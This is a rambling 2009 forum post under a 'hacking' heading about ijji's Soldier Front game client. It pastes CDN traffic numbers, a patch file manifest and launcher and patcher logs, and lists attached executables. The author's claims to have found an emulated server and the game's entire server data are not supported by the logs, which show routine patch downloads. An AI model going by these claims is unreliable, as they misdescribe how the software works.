//-USED TO MAKE EMULATED SERVERS ABOUT IJJI <--- FROM THE PATH FOUND BY ME.

SERVER SHUT DOWN.
--------------------------
PEace,
Mitch1490 ^_^

I DID FOR WORLD GAME EMULATE IJJI FOR YOU'S.


OR SIMPLY CLICK ON THIS APOLOGIZE IJJI:



NOW THEY ARE IN THIS MOMENT CHANGING THIS:

cdn.ijjimax.com 2571 cdn.ijjimax.com:80 47 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

OH WAIT NOW

cdn.ijjimax.com 53356 cdn.ijjimax.com:80 5221 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

IJJI IS WORKING IN SAME TIME AS ME LOOK

cdn.ijjimax.com 70250 cdn.ijjimax.com:80 51095 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

NOW I GOT 4 BOXES FROM THE CDN ENTIRE SERVER INFORMATION STOP TRYING IJJI

cdn.ijjimax.com 74433 cdn.ijjimax.com:80 66292 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

I GUESS THE SERVER IS PLAYING WITH ME IN SOMEHOW TO GENERATE THE OFFSET NUMBERS (VARIABLE)

cdn.ijjimax.com 92111 cdn.ijjimax.com:80 68522 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

OK NOW AFTER PRESSING THE F5 BUTTON TO REFRESH THIS ADDRESS TO SERVER SERVICES
CLICK THIS LINK. I'M DONE PLAYING ALONE, PLAY YOURSELF TO KNOW.

LINK: http://services.ijji.com/service/cdn/traffic

PRESS F5 TO REFRESH.

NOW.

cdn.ijjimax.com 86506 cdn.ijjimax.com:80 102493 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

IF IJJI LOOKING HERE~

I'm Sincerely Sorry for the time lost to you.

IF ( NOT )
{
STD CALL_GivemeJob
}
Return NOT;

DONE NOW LET C THE NUMBERS YOU GOT ^_^

HERE I GOT THIS IN PRESENT

cdn.ijjimax.com 78905 cdn.ijjimax.com:80 128214 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

NOW THAT I'VE WRITTEN THIS PART OF CODE IT WILL GENERATE A NEW ONE TO SERVER MAINTENANCE.

THIS IS WHAT SERVER MAINTENANCE MEANS.

NOW LET'S SEE ...
----------------------------
2 Mins::Passed
THIS:: cdn.ijjimax.com 96366 cdn.ijjimax.com:80 133516 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0
WAITING::NEW RECT SERVER ADDRESS
WAIT::WAIT
SYSFAILED::FAIL(2mins)

NEW HOOK 4 MINS::PASSED
THIS GENERATED BY SOMEONE WORKING IN SAME TIME AS ME PLAYING AROUND
cdn.ijjimax.com 79954 cdn.ijjimax.com:80 109185 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

TRY IT I PLAYED 1 HOUR !!!!~

#FOR REAL

{
NOW
}

RETURN INFINITELY;
_____________________
Peace,
Mitch1490 ^_^ Gooogle'it.

NOW FOR ALL THE SYSTEM RESTRICTIONS DUE TO YOUR COMPUTER ADMINISTRATION.

This TOOL :: RRT
Attached Files
ijjigamepluginremovetool.exe.zip (83.1 KB)
SERVER CHANGES.zip (332.7 KB)
SERVER CHANGES 2.zip (401.1 KB)
RRT.zip (42.3 KB)

Last edited by Carbone14; 01-21-2009 at 04:02 PM. Reason: SERVER PATH CHANGES


SF Hacking (Purple Folder)

Hacking 2009. 2. 10. 08:35
Post Purple Folder for GG server by Mitch1490

Hi to everyone,

After cleaning my PC from stupid system poop files of the restriction of whatever...

I Have Found The Server Emulated By IJJI For The Game.

The PurpleBean.exe is checking this:

BE AWARE THIS IS THE ENTIRE GAME OF IJJI SERVER SF (MAP, LOBBY, SOUNDS, ITEMS, ETC.)

#PrePatch info. (FOR REAL SOLDIER FRONT)

On XP or Vista the path to it is "C:\Documents and Settings\me\Application Data\ijjigame".

WARNING: I said Read.
----------------------------
Now I said Get up, IJJI's DOWN. LOOK PAGE 2.

Name files:


//SERVER SCAN NPROTECT & INSTALL XFIRE

u_sf.hul
Code:
PRJNAME U_SF_R
PUBDATE 081015-011258
TCHKSUM 2027549859
TFILENO 187
TZIPSIZE 389047119
DAYLIGHTSAVING 1
 
 
/
ijjiuninstall.exe,             28036552, 294912,   141412,   20080508-104503
ijjilauncher_postplugindll_01.dll,3981295,  53248,    24999,    20070718-190530
 
 
/u_sf
sf.ico,                        185810,   2998,     1097,     20081014-220929
hanpollforclient.dll,          13330850, 151552,   79915,    20071114-211302
cname.hdc,                     4290441,  33604,    33735,    20080826-220318
chat.hdc,                      3890504,  30724,    30848,    20080826-220318
soldierfront.exe,              193480878,1536512,  1523155,  20081014-123109
quietusvs.ini,                 7573,     93,       200,      20061220-173820
specialforceus.ini,            44293,    348,      487,      20080518-234418
hyperpeer.dll,                 13226245, 155648,   59507,    20070607-151450
dbghelp.dll,                   73921967, 665600,   315692,   20061207-121608
enet.dll,                      1582724,  32768,    10905,    20061016-201952
gameguard.des,                 34065372, 277185,   273456,   20080806-124813
hanauthforclient.dll,          16209233, 303104,   94287,    20070417-182840
hanreportforclient.dll,        13169883, 155648,   75304,    20070326-103100
iaf.dll,                       19667167, 225280,   106511,   20081007-094626
mss32.dll,                     34333188, 374272,   173123,   20041210-233530
msvcp60.dll,                   37374268, 401462,   116252,   20001121-150236
msvcp71.dll,                   47651898, 499712,   132586,   20060404-193134
msvcp71d.dll,                  79667358, 765952,   180968,   20060317-062802
msvcr71.dll,                   35175063, 348160,   181017,   20060404-192258
msvcr71d.dll,                  56033397, 544768,   230649,   20060317-062830
msvcrtd.dll,                   40344765, 385100,   160306,   19980617-010000
quietus.dll,                   2074272,  40960,    14365,    20050707-204146
 
 
/u_sf/data
default.cfg,                   143779,   1875,     707,      20080321-140010
 
 
/u_sf/data/area
area_015.sff,                  510394094,8427186,  2324971,  20080825-102310
area_014.sff,                  1714681771,24946018, 5590906,  20080624-105707
area_012.sff,                  2992223,  47740,    10766,    20080124-110718
area_010.sff,                  -1238837083,33945548, 13072739, 20071023-113306
area_009.sff,                  346273762,4220751,  895279,   20070409-160000
area_008.sff,                  -1978400990,32344143, 8352438,  20070404-181758
area_007.sff,                  270967417,4447834,  1105094,  20070301-185440
area_006.sff,                  50795408, 864790,   197190,   20070115-150228
area_005.sff,                  1736772,  19096,    9089,     20070103-201452
area_004.sff,                  270967417,4447834,  1105094,  20061205-183236
area_003.sff,                  5996935,  63458,    28901,    20061016-132246
area_002.sff,                  5471943,  59405,    25367,    20060904-165740
area_001.sff,                  1571834858,221534990,98447852, 20060403-163818
area_011.sff,                  377169895,6709437,  1788463,  20071211-152448
 
 
/u_sf/data/clan
clanmark_symbol.dfz,           117087997,898680,   891776,   20081015-011156
clanmark_frame.dfz,            47241435, 351987,   348642,   20081015-011156
clanmark_bg.dfz,               173871500,1282560,  1279451,  20081015-011156
clanmark3.dfz,                 1258836136,9194654,  9034194,  20061117-131306
clanmark2.dfz,                 1101375342,8033663,  7892874,  20061117-131256
clanmark1.dfz,                 1178585289,8611856,  8480590,  20080131-201348
 
 
/u_sf/data/effect
effect_002.sff,                267734830,2097490,  705203,   20080918-111057
effect_001.sff,                317286380,3220158,  1129414,  20060403-163908
 
 
/u_sf/data/force
force_010.sff,                 61497104, 818377,   304140,   20080424-225300
force_009.sff,                 1112537751,11394298, 7024817,  20080331-135242
force_008.sff,                 1435199637,15096954, 8442912,  20080325-135212
force_007.sff,                 1552052578,16138304, 9221610,  20080311-161122
force_006.sff,                 57392645, 640433,   353754,   20080201-110344
force_005.sff,                 22656488, 255855,   55224,    20080204-113610
force_004.sff,                 107382726,1262695,  651875,   20071211-152448
force_003.sff,                 151358472,1380541,  1023891,  20071008-102356
force_002.sff,                 22185361, 213795,   106549,   20070712-125220
force_001.sff,                 -181145931,41968009, 23988072, 20060628-135914
force_017.sff,                 10405098, 107079,   54509,    20081010-153432
force_012.sff,                 1000791991,9738970,  5904717,  20080624-105709
force_013.sff,                 890902,   9446,     1677,     20080709-104429
force_014.sff,                 146776134,1683329,  891532,   20080718-102321
force_015.sff,                 21620293, 237024,   107510,   20080825-102311
force_016.sff,                 57006727, 577913,   288534,   20080922-114056
force_018.sff,                 463521833,5020588,  2803425,  20081030-211807
force_020.sff,                 8531505,  120992,   18947,    20081002-183432
force_021.sff,                 7185400,  79952,    38348,    20081014-123109
force_019.sff,                 171949948,1784532,  1060547,  20081124-154954
force_011.sff,                 1058004375,10290717, 6542236,  20080527-233819
 
 
/u_sf/data/lobby
lobbydata33.mrg,               2016446447,16083552, 2759485,  20080124-110718
lobbydata23.mrg,               945314,   4879,     1211,     20070919-110102
lobbydata34.mrg,               743268192,5239571,  679553,   20080212-164704
lobbydata32.mrg,               675337549,5161732,  908191,   20080109-151252
lobbydata31.mrg,               290837148,2015812,  540804,   20080104-202458
lobbydata30.mrg,               767612555,5186244,  2596702,  20071218-144052
lobbydata17.mrg,               536006423,3159379,  1072839,  20070621-103500
lobbydata18.mrg,               9631021,  73540,    18777,    20070627-175658
lobbydata28.mrg,               299078031,2018082,  763110,   20071127-174122
lobbydata43.mrg,               771047287,5379638,  881142,   20080825-102308
lobbydata26.mrg,               38058529, 253818,   57783,    20071023-113306
lobbydata25.mrg,               296928285,2015812,  671318,   20071016-102308
lobbydata24.mrg,               29482028, 215120,   65372,    20071008-102356
lobbydata22.mrg,               262494426,2015812,  708823,   20070831-160452
lobbydata21.mrg,               7594902,  53440,    12675,    20070801-191330
lobbydata20.mrg,               372727,   1784,     821,      20070724-180928
lobbydata2.mrg,                376410421,3168166,  390027,   20061102-173734
lobbydata19.mrg,               2407222,  16580,    2005,     20070712-125724
lobbydata29.mrg,               360402845,2489745,  699169,   20071211-152450
lobbydata42.mrg,               436062428,2888870,  655502,   20080718-102320
lobbydata14.mrg,               759096975,5705673,  1115770,  20070521-170906
lobbydata45.mrg,               16185795, 116742,   58109,    20081010-153432
lobbydata44.mrg,               390561560,2689951,  941237,   20080922-235357
lobbydata27.mrg,               651819467,5169641,  1289698,  20071114-165336
lobbydata16.mrg,               416221766,3170436,  354756,   20070612-173730
lobbydata41.mrg,               802470296,5525970,  923110,   20080624-105702
lobbydata40.mrg,               976147441,6786738,  892461,   20080527-233817
lobbydata4.mrg,                809287,   4582,     1313,     20061115-120400
lobbydata39.mrg,               377743561,2620822,  864346,   20080424-225259
lobbydata35.mrg,               222832223,1582797,  181708,   20080201-110344
lobbydata38.mrg,               54813103, 442756,   278390,   20080331-135210
lobbydata37.mrg,               508844564,3599202,  441691,   20080325-135212
lobbydata1.mrg,                -1264129724,21233249, 4491247,  20061017-194750
lobbydata10.mrg,               413114057,3146944,  340270,   20070320-181442
lobbydata3.mrg,                658788772,5182637,  857525,   20061108-164638
lobbydata11.mrg,               229417753,1622404,  348502,   20070411-173658
lobbydata12.mrg,               280942,   1365,     719,      20070411-175534
lobbydata13.mrg,               71354648, 540758,   127607,   20070504-155950
lobbydata36.mrg,               289879671,2015812,  432304,   20080311-161122
lobbydata15.mrg,               3622036,  26141,    10550,    20070608-092610
lobbydata6.mrg,                6672578,  50271,    2188,     20070104-151804
lobbydata5.mrg,                717878850,5181283,  1019447,  20061220-170144
lobbydata48.mrg,               303578235,2117923,  673480,   20081014-123108
lobbydata47.mrg,               807338526,5646522,  2231844,  20081124-154951
lobbydata46.mrg,               1690312008,11276735, 3601398,  20081030-211806
lobbydata7.mrg,                207305,   1019,     620,      20070123-134458
lobbydata8.mrg,                340467,   1710,     993,      20070205-195056
patchlog.log,                  212,      6,        130,      20081002-181029
sf_curse.drk,                  825938,   11711,    2575,     20061103-165308
pure.drk,                      193682,   1416,     872,      20040630-174314
notice.txt,                    110820,   1273,     777,      20081009-140005
lobbydata9.mrg,                631355,   3526,     1146,     20070212-212422
 
 
/u_sf/data/menu
menu_016.sff,                  5554440,  98500,    8421,     20071211-152448
menu_027.sff,                  51839415, 361580,   58039,    20081124-154950
menu_026.sff,                  15266890, 337160,   74512,    20081030-211803
menu_025.sff,                  8580108,  180790,   38343,    20081010-153432
menu_024.sff,                  450964257,3472493,  2714573,  20080922-114055
menu_023.sff,                  295870066,2290232,  1197935,  20080825-102306
menu_008.sff,                  7467119,  103876,   7429,     20070307-113458
menu_021.sff,                  25823987, 180792,   22082,    20080624-105702
menu_020.sff,                  26008759, 197368,   25692,    20080424-225259
menu_019.sff,                  2209158,  33936,    11912,    20080201-110344
menu_018.sff,                  4222059,  191992,   14068,    20080204-113610
menu_017.sff,                  1620406052,12602120, 11886079, 20080124-110718
menu_028.sff,                  1770498283,15219325, 12850636, 20081014-123108
menu_022.sff,                  25692931, 180792,   28922,    20080718-102319
menu_002.sff,                  1273820467,10024564, 9482189,  20061102-152156
menu_014.sff,                  78926376, 630417,   609812,   20071023-113306
menu_013.sff,                  102135280,873192,   214732,   20071008-102356
menu_012.sff,                  25431987, 180792,   26348,    20070712-125316
menu_011.sff,                  64474075, 1060804,  24090,    20070621-103404
menu_009.sff,                  12295773, 66260,    9290,     20070328-110516
menu_007.sff,                  77121030, 492640,   74728,    20070213-122442
menu_006.sff,                  18951713, 164216,   27909,    20070205-160120
menu_005.sff,                  20244639, 98848,    3910,     20070108-194944
menu_004.sff,                  1272170947,10003071, 9607062,  20061227-182018
menu_003.sff,                  1242291073,9675547,  9441139,  20061116-210124
menu_015.sff,                  83227843, 652823,   631706,   20071114-165336
menu_001.sff,                  -2046088635,22684136, 15169697, 20061017-164920
 
 
/u_sf/data/save
savereadme.txt,                1856,     24,       152,      20060403-164502
 
 
/u_sf/data/scr
scr_001.sff,                   147945064,925523,   259663,   20081014-123108
 
 
/u_sf/data/screenshot
shotreadme.txt,                2266,     27,       155,      20060403-164522
 
 
/u_sf/data/sound
sound_010.sff,                 18140564, 143906,   99452,    20080624-105703
sound_016.sff,                 14586589, 111826,   89045,    20081014-123109
sound_005.sff,                 21292383, 176088,   170476,   20061212-161740
sound_006.sff,                 20612563, 182351,   163369,   20070328-110600
sound_007.sff,                 21290561, 176925,   137170,   20070712-125504
sound_004.sff,                 107385086,883501,   849260,   20061108-150556
sound_015.sff,                 14980831, 121336,   70809,    20081124-154953
sound_014.sff,                 25434910, 169124,   99281,    20081030-211806
sound_013.sff,                 38838015, 245256,   155448,   20080918-111056
sound_008.sff,                 39187553, 323109,   314204,   20071023-113306
sound_009.sff,                 9442456,  80342,    65082,    20080424-225259
sound_003.sff,                 92021964, 772707,   629663,   20061031-194520
sound_002.sff,                 225269683,1951937,  1733425,  20060906-154850
sound_001.sff,                 -2119502634,17655980, 15102608, 20060403-164254
sound_012.sff,                 36453582, 295966,   208893,   20080825-102311
sound_011.sff,                 43945887, 370783,   205354,   20080718-102320
 
 
/u_sf/data/weapon
weapon_007.sff,                302252859,2867816,  1745791,  20080922-114056
weapon_006.sff,                109226159,1078459,  623795,   20080820-121816
weapon_001.sff,                -2004935247,22128641, 13509239, 20060403-164348
weapon_002.sff,                80548881, 784772,   422009,   20070712-125552
weapon_005.sff,                56663656, 554351,   349914,   20080711-111437
weapon_003.sff,                53861086, 535052,   308134,   20080418-124838
weapon_004.sff,                52072675, 515669,   316501,   20080619-104829
weapon_011.sff,                58479264, 545049,   370186,   20081002-185458
weapon_010.sff,                194290321,1823110,  1218500,  20081124-154954
weapon_009.sff,                195424374,1623153,  1243438,  20081022-031542
weapon_008.sff,                122258503,1209344,  715331,   20081006-230647
 
 
/u_sf/redist
mssvoice.asi,                  23130939, 214528,   116863,   20041210-233742
msssoft.m3d,                   7613837,  79360,    45180,    20041210-233626
mssrsx.m3d,                    39669920, 372224,   221493,   20041210-233632
mssmp3.asi,                    13821001, 149504,   75538,    20041210-233624
msseax.m3d,                    13245737, 143872,   68195,    20041210-233628
mssdx7.m3d,                    6138108,  65536,    30863,    20041210-233630
mssdsp.flt,                    10707007, 113664,   58526,    20041210-233532
mssds3d.m3d,                   5215788,  56320,    28616,    20041210-233630
mssa3d.m3d,                    6529387,  72704,    38467,    20041210-233632
 
 
/xfire //HERE xfire
xfire_installer_24715.soldierfront.exe,306197609,2417720,  2391082,  20070612-115632
 
[uninstall]
 
<EOF>
//PROCESS::ALLPREPATCH HERE~

//Function to get Wnd (WINDOW): Find Purple Folder

[CPurpleMessenger::FindPurpleWnd]

Succeeded to get hwnd = 2359400

//Display PAtch Updates (IN MODE=0)

[WndProc]TID_DISPLAY_PREPATCH_PROC

[PrePatchProc]Mode = 0


//HUL SERVER EMULATION

[GET_GAME_INFO]Patch method is hul

[SET_ROOT_FOLDER]m_szRegKeyInstall = SOFTWARE\Dragonfly\soldierfront

[SET_ROOT_FOLDER]m_szRegValuePath = installPath

[SET_ROOT_FOLDER]Trim Right

[SET_ROOT_FOLDER]Succeeded to query value = installPath

[SET_ROOT_FOLDER]Install path = C:\ijji\ENGLISH

[DOWNLOAD_HUL]Start

[DOWNLOAD_HUL]Hul Directory = C:\Documents and Settings\me\Application Data\ijjigame\HUL

[DOWNLOAD_HUL]Succeeded to delete Hul = C:\Documents and Settings\me\Application Data\ijjigame\HUL\u_sf.hul
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...ewhul/u_sf.hul ]->[ C:\Documents and Settings\me\Application Data\ijjigame\HUL\u_sf.hul ]


[DOWNLOAD_HUL]End.


//PARSING FILES TO GET
[PARSING_HUL]Start.
[PARSING_HUL]End.

//CHECK IT
[CHECK_LOCAL_FILES]Start.
[CHECK_LOCAL_FILES]End.

//DO PATCH & INSTALL UTILITIES
[DO_PATCH]Start.

[DO_PATCH]Need to patch.

//IJJI SF UNINSTALL
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nstall.exe.zip ]->[ C:\ijji\ENGLISH\ijjiuninstall.exe.zip ]

//LOBBY FILES
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...data39.mrg.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\lobby\lobbydata39.mrg.zip ]

//MENU FILES
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nu_020.sff.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\menu\menu_020.sff.zip ]

//SOUNDS FILES
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nd_009.sff.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\sound\sound_009.sff.zip ]

//XFIRE INSTALL FILES
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...rfront.exe.zip ]->[ C:\ijji\ENGLISH\\xfire\xfire_installer_24715.soldierfront.exe.zip ]



[DO_PATCH]We don't need to patch.

[DO_PATCH]End.

//END PATCH & RESULT IN 1 (because normally it starts with 0). Duh.


Result = 1


[CWorkerThread::WorkerThread]End

//{
bRet = 1
//}

//return;

[StartPatch] End


//////////////////////////END OUT BOUNDER///////////////////




ijjiPrePatch.txt
Code:
[17:34:07] START DoPrePatch
[17:34:07] [CWorkerThread::SetParam]Start
[17:34:07] [CWorkerThread::Start]Succeeded to create thread.
[17:34:07] [CPPImpl::DoPatching]Start!
[17:34:07] [CPPImpl::PARSE_GAMESTRING]Start
[17:34:07] [CPPImpl::REGISTER_PP_WNDCLASS]Start
[17:34:07] [CPPImpl::CREATE_PP_WINDOW]Start
[17:34:07] [CPPImpl::GET_GAME_INFO]Start.
[17:34:07] [CPPImpl::GET_GAME_INFO]_sLocPPInfoFileName = [C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini], _sSvrPPInfoFileName = [http://cdn.ijjimax.com/nhnusa/games/arcade/purple/plii/u_sf/u_sf_ppinfo.ini]
[17:34:07] [CPPImpl::GET_GAME_INFO]Succeeded to delete [C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini]
[17:34:08] [CPPImpl::GET_GAME_INFO]Download common cfg.
[17:34:08] [CPPImpl::GET_GAME_INFO]Download [http://cdn.ijjimax.com/nhnusa/games/arcade/purple/plii/common/cfg/pp_config.ini] to [C:\DOCUME~1\me\LOCALS~1\Temp\\pp_config.ini].
[17:34:08] [CPPImpl::GET_GAME_INFO]End.
[17:34:08] [CPPImpl::SET_ROOT_FOLDER]Start
[17:34:08] [CPPImpl::SET_ROOT_FOLDER]Trim Right
[17:34:08] [CPPImpl::SET_ROOT_FOLDER]Succeeded to get installpath [C:\ijji\ENGLISH]
[17:34:08] [CPPImpl::GET_PP_VERSION]Start
[17:34:08] [CPPImpl::GET_PP_VERSION]_sLocHgverFilename = [C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf.pv], _sSvrHgverFilename = [http://cdn.ijjimax.com/nhnusa/games/arcade/U_SF/prepatch/u_sf.pv]
[17:34:08] [CPPImpl::GET_PP_VERSION]Succeeded to download prepatch version
[17:34:08] [CPPImpl::GET_PP_VERSION]Succeeded to read prepatch version [1003]
[17:34:08] [CPPImpl::GET_PP_VERSION]_sLocHgverFilename = [C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf.cv], _sSvrHgverFilename = [http://cdn.ijjimax.com/nhnusa/games/arcade/U_SF/patch/u_sf.cv]
[17:34:08] [CPPImpl::GET_PP_VERSION]Succeeded to read current version [1003]
[17:34:08] [CPPImpl::GET_PP_VERSION]PrePatchVersion: 1003, CurrentVersion : 1003
[17:34:08] [CPPImpl::DO_PRE_PATCH]Start
[17:34:08] [CPPImpl::DO_PRE_PATCH]Local pre-patch file [C:\Documents and Settings\me\Application Data\ijjigame\u_sf_1003.pfile]
[17:34:08] [CPPImpl::DO_PRE_PATCH]The pre-patch version is same with current version.
[17:34:08] [CPPImpl::DO_PRE_PATCH]The pre-patch file is not downloaded. Do nothing.
[17:34:08] [CPPImpl::DoPatching]Complete Prepatch
[17:34:08] [CPPImpl::POST_COMPLETE_PREPATCH]Code = [0]
//PROCESSED PREPATCH


ijjiPurpleOutBounder.txt
Code:
[17:34:07] START Purple OutBound
[17:34:07] [SUCCESS]Mutex Check
[17:34:07] [SUCCESS]Get command line
[17:34:07] [SUCCESS]Parse command line
[17:34:07] [CPurpleMessenger::FindPurpleWnd]Succeeded to get hwnd = 2359400
[17:34:07] Start pre-patch proc
[17:34:07] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:07] [PrePatchProc]Mode = 0
[17:34:07] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:07] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]UWM_PREPATCH_DONE
[17:34:08] [StartPatch]Start
[17:34:08] [CWorkerThread::Start]Start
[17:34:08] [CWorkerThread::Start]Succeeded to create thread
[17:34:08] [CWorkerThread::WorkerThread]Start
[17:34:08] [CPurpleMessenger::FindPurpleWnd]Succeeded to get hwnd = 2359400
[17:34:08] [GET_GAME_INFO]GameId = u_sf
[17:34:08] [GET_GAME_INFO]_sLocPPInfoFileName = C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini
[17:34:08] [GET_GAME_INFO]_sSvrPPInfoFileName = http://cdn.ijjimax.com/nhnusa/games/..._sf_ppinfo.ini
[17:34:08] [GET_GAME_INFO]Succeeded to delete C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini
[17:34:08] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/..._sf_ppinfo.ini ]->[ C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini ]
[17:34:08] [GET_GAME_INFO]Succeeded to download http://cdn.ijjimax.com/nhnusa/games/..._sf_ppinfo.ini to C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini
[17:34:08] [GET_GAME_INFO]Patch method is hul   //METHOD HUL (SERVER EMU TO REGISTERY)
[17:34:08] [SET_ROOT_FOLDER]m_szRegKeyInstall = SOFTWARE\Dragonfly\soldierfront
[17:34:08] [SET_ROOT_FOLDER]m_szRegValuePath = installPath //INSTALL REG
[17:34:08] [SET_ROOT_FOLDER]Trim Right
[17:34:08] [SET_ROOT_FOLDER]Succeeded to query value = installPath
[17:34:08] [SET_ROOT_FOLDER]Install path = C:\ijji\ENGLISH
[17:34:08] [DOWNLOAD_HUL]Start
[17:34:08] [DOWNLOAD_HUL]Hul Directory = C:\Documents and Settings\me\Application Data\ijjigame\HUL //PATH TO HUL DIRECTORY 
[17:34:08] [DOWNLOAD_HUL]Succeeded to delete Hul = C:\Documents and Settings\me\Application Data\ijjigame\HUL\u_sf.hul
[17:34:08] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...ewhul/u_sf.hul ]->[ C:\Documents and Settings\me\Application Data\ijjigame\HUL\u_sf.hul ]
[17:34:09] [DOWNLOAD_HUL]End.
[17:34:09] [PARSING_HUL]Start.
[17:34:09] [PARSING_HUL]End.
[17:34:09] [CHECK_LOCAL_FILES]Start.
[17:34:10] [CHECK_LOCAL_FILES]End.
[17:34:10] [DO_PATCH]Start.
[17:34:10] [DO_PATCH]Need to patch.
[17:34:10] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nstall.exe.zip ]->[ C:\ijji\ENGLISH\ijjiuninstall.exe.zip ]
[17:34:11] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...data39.mrg.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\lobby\lobbydata39.mrg.zip ]
[17:34:19] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nu_020.sff.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\menu\menu_020.sff.zip ]
[17:34:19] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nd_009.sff.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\sound\sound_009.sff.zip ]
[17:34:20] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...rfront.exe.zip ]->[ C:\ijji\ENGLISH\\xfire\xfire_installer_24715.soldierfront.exe.zip ]
[17:34:41] [DO_PATCH]We don't need to patch.
[17:34:41] [DO_PATCH]End. Result = 1
[17:34:41] [CWorkerThread::WorkerThread]End bRet = 1
[17:34:41] [StartPatch]End
[17:34:41] End of ijjiPurpleOutBounder


//////////////////////Beanlog/////////////////////////////////
-----------------------Start--------------------------------------
The Beanlog tells to create the pointer window 120284.
Using NB Mode.
///////////////////////////////////////
To this function.
CPBUploadMgr::Work() start

Now After the game mode Placed.

try GETFILE::u_sf_1003.pfile

CPBUploadMgr::Work() End
//////////////////////////////////////
CPBUploadMgr thread Terminated
CPurpleBean thread Terminated

ReleaseSDK()

~CPBGameInfo()
--------------END---------------------


Beanlog.txt
Code:
[17:34:42] [DEBUG] Create Window... 120284
[17:34:42] [INFO] Use NB Mode
[17:34:44] [DEBUG] CPBUploadMgr::Work()... Begin
[17:34:44] [INFO] Try to find out process...
[17:36:14] [INFO] Success... find out process
[17:36:14] [INFO] AfterGame mode
[17:36:14] [INFO] Waitting for terminate process...
[17:37:55] [INFO] Process terminated in AfterGame mode, so start upload logic. 
[17:37:55] [INFO] Find out file in default path
[17:37:55] [INFO] Can't find out file in default path... C:\Documents and Settings\me\Application Data\ijjigame\u_sf_1003.pfile
[17:37:55] [INFO] Start Uploading.. : C:\Documents and Settings\me\Application Data\ijjigame\U_SFInstaller.exe
[17:37:55] [DEBUG] CPBUploadMgr::Work()... End
[17:38:10] [DEBUG] CPBUploadMgr thread Terminated..
[17:38:10] [INFO] CPurpleBean thread Terminated..
[17:38:13] [DEBUG] ReleaseSDK()..
[17:38:13] [DEBUG] ~CPBGameInfo()..

MyPurpleLog.c
Code:
[17:34:03] [WARNING] Fail to download cipher text. error code = -12147. Try to download plain text.
[17:34:03] [WARNING] There is no setting::ui tag. Default value "core" applied
[17:34:03] [INFORM] Analyze Param Ended
[17:34:04] [WARNING] There is no background filename in ui::background. Default image will be used.
[17:34:04] [INFORM] Create window Ended
[17:34:04] [INFORM] common module manager started
[17:34:04] [INFORM] full environment path = C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\WBEM;C:\WINDOWS.000;C:\WINDOWS.000\COMMAND;C:\ijji\ENGLISH
[17:34:04] [INFORM] dll path = C:\ijji\ENGLISH
[17:34:04] [INFORM] RPC : OnInitialize
[17:34:05] [INFORM] RPC : interface calling is ended. result of CheckSFInstall is 3
[17:34:06] [INFORM] RPC : interface calling is ended. result of ijjiPurplePlugin_Execute is 1
[17:34:06] [INFORM] Show download Dialog
[17:34:07] [INFORM] Show html http://game.ijji.com/purplelauncher/...hn?gameId=u_sf
[17:34:07] [INFORM] Show update Dialog
[17:34:07] [INFORM] Updater Started
[17:34:07] [INFORM] RPC : OnMaintUIBefore
[17:34:41] [INFORM] Ready to Run Client
[17:34:41] [INFORM] Write Registry ended. Game update is finished
[17:34:41] [INFORM] RPC : interface calling is ended. result of LaunchBean is 3
[17:35:40] [INFORM] Execution has been succeeded!

ONLY FOR PRE-PATCH TO PATCH VERSION GAMES WDS
Like this function used in PurpleBean.exe:

[CPPImpl::GET_PP_VERSION]Start



-------->GET_PP_VERSION


_sLocHgverFilename
http://cdn.ijjimax.com/nhnusa/games/...epatch/u_sf.pv

-------->1004
*******************
All this upper GET this thing for c++ D3d_ASM emu


pp_config.ini
Code:
 
#FOR REAL
[CDN]
